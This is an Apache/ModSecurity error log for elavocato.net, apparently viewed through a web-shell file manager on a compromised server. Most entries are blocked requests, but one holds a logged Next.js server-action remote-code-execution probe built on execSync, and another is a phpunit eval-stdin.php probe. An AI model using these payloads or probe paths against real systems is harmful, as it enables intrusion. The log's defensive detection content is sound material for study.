⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.81
Server IP:
178.33.27.10
Server:
Linux cpanel.dev-unit.com 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
Server Software:
Apache/2.4.62 (Unix) OpenSSL/1.0.2k-fips
PHP Version:
8.2.25
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
proc
/
self
/
root
/
usr
/
local
/
apache
/
domlogs
/
View File Name :
elavocato.net.error.log
[Sun Mar 29 13:08:58.753306 2026] [:error] [pid 22808:tid 22839] [client 43.163.206.70:55138] [client 43.163.206.70] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "elavocato.net"] [uri "/mahmoudsaberabouhelwa@gmail.com"] [unique_id "ackISgl1SKb_ZdZ8MvvKzAAAAJc"] [Sun Mar 29 13:59:57.396935 2026] [:error] [pid 22453:tid 22488] [client 43.166.251.233:53522] [client 43.166.251.233] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "elavocato.net"] [uri "/ar/mahmoudsaberabouhelwa@gmail.com"] [unique_id "ackUPSgzg-Mm9DaLrWzMjwAAAAo"] [Sun Mar 29 14:47:49.162372 2026] [:error] [pid 22454:tid 22510] [client 158.158.55.146:53413] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/index.php [Sun Mar 29 19:51:46.451580 2026] [:error] [pid 22808:tid 22819] [client 43.130.78.203:51902] [client 43.130.78.203] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "elavocato.net"] [uri "/ar/service/mahmoudsaberabouhelwa@gmail.com"] [unique_id "aclmsgl1SKb_ZdZ8Mvu30QAAAIM"] [Sun Mar 29 20:47:29.519578 2026] [:error] [pid 22454:tid 22518] [client 43.130.26.3:44548] [client 43.130.26.3] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.elavocato.net"] [uri "/ar/mahmoudsaberabouhelwa@gmail.com"] [unique_id "aclzwa85gMOsWK6R9FCGtwAAAE0"] [Mon Mar 30 02:27:27.913157 2026] [:error] [pid 22454:tid 22529] [client 43.135.182.95:42990] [client 43.135.182.95] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.elavocato.net"] [uri "/mahmoudsaberabouhelwa@gmail.com"] [unique_id "acnDb685gMOsWK6R9FBtwAAAAFg"] [Mon Mar 30 03:58:25.939845 2026] [:error] [pid 14385:tid 14409] [client 43.166.134.114:45742] [client 43.166.134.114] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.elavocato.net"] [uri "/ar/service/mahmoudsaberabouhelwa@gmail.com"] [unique_id "acnYwUYk5R-7nmVc5r-HIQAAANY"] [Mon Mar 30 06:14:04.332008 2026] [:error] [pid 9210:tid 9419] [client 143.244.47.83:53030] [client 143.244.47.83] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "elavocato.net"] [uri "/mahmoudsaberabouhelwa@gmail.com"] [unique_id "acn4jOHXtXoJj1jQoS2OXQAAARY"], referer: https://elavocato.net/ar [Mon Mar 30 09:50:01.907273 2026] [:error] [pid 9210:tid 9418] [client 54.37.254.160:55442] [client 54.37.254.160] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "elavocato.net"] [uri "/mahmoudsaberabouhelwa@gmail.com"] [unique_id "acorKeHXtXoJj1jQoS0J1AAAARU"] [Mon Mar 30 11:00:26.203171 2026] [:error] [pid 14200:tid 14292] [client 65.108.2.171:35916] [client 65.108.2.171] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "elavocato.net"] [uri "/ar/about-us/mahmoudsaberabouhelwa@gmail.com"] [unique_id "aco7qg3SlEU7bqae3d4w0gAAAEY"] [Mon Mar 30 11:00:27.829100 2026] [:error] [pid 9210:tid 9421] [client 65.108.2.171:35918] [client 65.108.2.171] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "elavocato.net"] [uri "/ar/mahmoudsaberabouhelwa@gmail.com"] [unique_id "aco7q-HXtXoJj1jQoS2O_AAAARg"] [Mon Mar 30 11:00:32.625269 2026] [:error] [pid 14201:tid 14318] [client 65.108.2.171:47792] [client 65.108.2.171] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "elavocato.net"] [uri "/ar/service/mahmoudsaberabouhelwa@gmail.com"] [unique_id "aco7sOKBXHH2U9dJa8aYMQAAAIs"] [Mon Mar 30 12:54:01.439621 2026] [:error] [pid 9694:tid 9756] [client 85.11.167.19:57416] [client 85.11.167.19] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'].*?[,].*(((v|(\\\\\\\\u0076)|(\\\\166)|(\\\\x76))[^a-z0-9]*(a|(\\\\\\\\u0061)|(\\\\141)|(\\\\x61))[^a-z0-9]*(l|(\\\\\\\\u006C)|(\\\\154)|(\\\\x6C))[^a-z0-9]*(u|(\\\\\\\\u0075)|(\\\\165)|(\\\\x75))[^a-z0-9]*(e|(\\\\\\\\u0065)|(\\\\145)|(\\\\x65))[^a-z0-9]*(O|(\\\\\\\\u004F)|(\\\\117)|(\\\\ ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "504"] [id "973347"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22_response\\x22:{\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo VULN_1774868073_6026',{'timeout':30000}).toString();throw Object.assign(new Error('NEXT_REDIRECT'),{digest: found within ARGS:0: {\\x22_response\\x22:{\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo VULN_1774868073_602..."] [ve [hostname "elavocato.net"] [uri "/"] [unique_id "acpWSa6G-b8-eE7YFeCuvwAAAYY"], referer: https://elavocato.net [Mon Mar 30 12:54:01.523127 2026] [:error] [pid 9210:tid 9414] [client 85.11.167.19:57426] [client 85.11.167.19] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'].*?[,].*(((v|(\\\\\\\\u0076)|(\\\\166)|(\\\\x76))[^a-z0-9]*(a|(\\\\\\\\u0061)|(\\\\141)|(\\\\x61))[^a-z0-9]*(l|(\\\\\\\\u006C)|(\\\\154)|(\\\\x6C))[^a-z0-9]*(u|(\\\\\\\\u0075)|(\\\\165)|(\\\\x75))[^a-z0-9]*(e|(\\\\\\\\u0065)|(\\\\145)|(\\\\x65))[^a-z0-9]*(O|(\\\\\\\\u004F)|(\\\\117)|(\\\\ ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "504"] [id "973347"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22_response\\x22:{\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo TEST_1774868073',{'timeout':30000}).toString();throw Object.assign(new Error('NEXT_REDIRECT'),{digest: found within ARGS:0: {\\x22_response\\x22:{\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo TEST_1774868073',{'timeo..."] [ve [hostname "elavocato.net"] [uri "/"] [unique_id "acpWSeHXtXoJj1jQoS1sYgAAARI"], referer: https://elavocato.net [Mon Mar 30 13:56:38.410598 2026] [:error] [pid 9210:tid 9394] [client 198.20.67.201:51906] [client 198.20.67.201] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.elavocato.net"] [uri "/ar/mahmoudsaberabouhelwa@gmail.com"] [unique_id "acpk9uHXtXoJj1jQoS3hSAAAAQE"] [Mon Mar 30 16:42:22.742317 2026] [:error] [pid 14201:tid 14297] [client 85.215.148.205:53125] [client 85.215.148.205] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "280"] [id "960011"] [rev "1"] [msg "GET or HEAD Request with Body Content."] [data "19"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "elavocato.net"] [uri "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "acqLzuKBXHH2U9dJa8YncQAAAIE"] [Tue Mar 31 03:05:52.484492 2026] [:error] [pid 9210:tid 9410] [client 147.135.213.38:38304] [client 147.135.213.38] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "elavocato.net"] [uri "/ar/about-us/mahmoudsaberabouhelwa@gmail.com"] [unique_id "acsd8OHXtXoJj1jQoS3HtgAAAQ8"] [Tue Mar 31 03:05:54.013291 2026] [:error] [pid 9210:tid 9399] [client 147.135.213.38:38304] [client 147.135.213.38] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "elavocato.net"] [uri "/ar/mahmoudsaberabouhelwa@gmail.com"] [unique_id "acsd8uHXtXoJj1jQoS3HxQAAAQU"] [Tue Mar 31 03:05:59.056417 2026] [:error] [pid 9694:tid 9774] [client 147.135.213.38:38466] [client 147.135.213.38] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "elavocato.net"] [uri "/ar/service/mahmoudsaberabouhelwa@gmail.com"] [unique_id "acsd966G-b8-eE7YFeCLVwAAAZg"] [Tue Mar 31 04:26:19.557756 2026] [:error] [pid 27977:tid 28094] [client 147.135.252.177:58032] [client 147.135.252.177] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "elavocato.net"] [uri "/en/mahmoudsaberabouhelwa@gmail.com"] [unique_id "acswy3iA5pR7rXgPLRPLigAAAQo"] [Tue Mar 31 04:26:33.602924 2026] [:error] [pid 31264:tid 31273] [client 147.135.252.177:45736] [client 147.135.252.177] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "elavocato.net"] [uri "/en/service/mahmoudsaberabouhelwa@gmail.com"] [unique_id "acsw2dGJPsZJwgjTUmaLfQAAAMc"] [Tue Mar 31 05:51:15.843202 2026] [:error] [pid 31120:tid 31163] [client 139.99.237.180:54508] [client 139.99.237.180] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "elavocato.net"] [uri "/mahmoudsaberabouhelwa@gmail.com"] [unique_id "actEs_khltFjKKfZYNrcIAAAAEQ"], referer: http://elavocato.net/ar [Tue Mar 31 05:51:43.496182 2026] [:error] [pid 31120:tid 31160] [client 139.99.237.180:36114] [client 139.99.237.180] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname 